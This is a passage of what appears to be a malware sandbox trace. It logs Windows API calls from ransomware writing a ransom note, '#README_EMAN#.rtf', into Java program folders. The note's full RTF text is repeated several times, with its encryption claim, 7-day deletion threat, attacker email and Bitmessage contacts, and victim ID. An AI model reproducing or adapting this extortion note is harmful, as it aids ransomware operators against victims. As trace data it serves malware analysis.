nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0203.669] WriteFile (in: hFile=0x2bc, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0203.669] CloseHandle (hObject=0x2bc) returned 1 [0203.670] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\#readme_eman#.rtf")) returned 0xffffffff [0203.671] GetLastError () returned 0x2 [0203.671] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\cmm\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0203.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0203.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0203.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 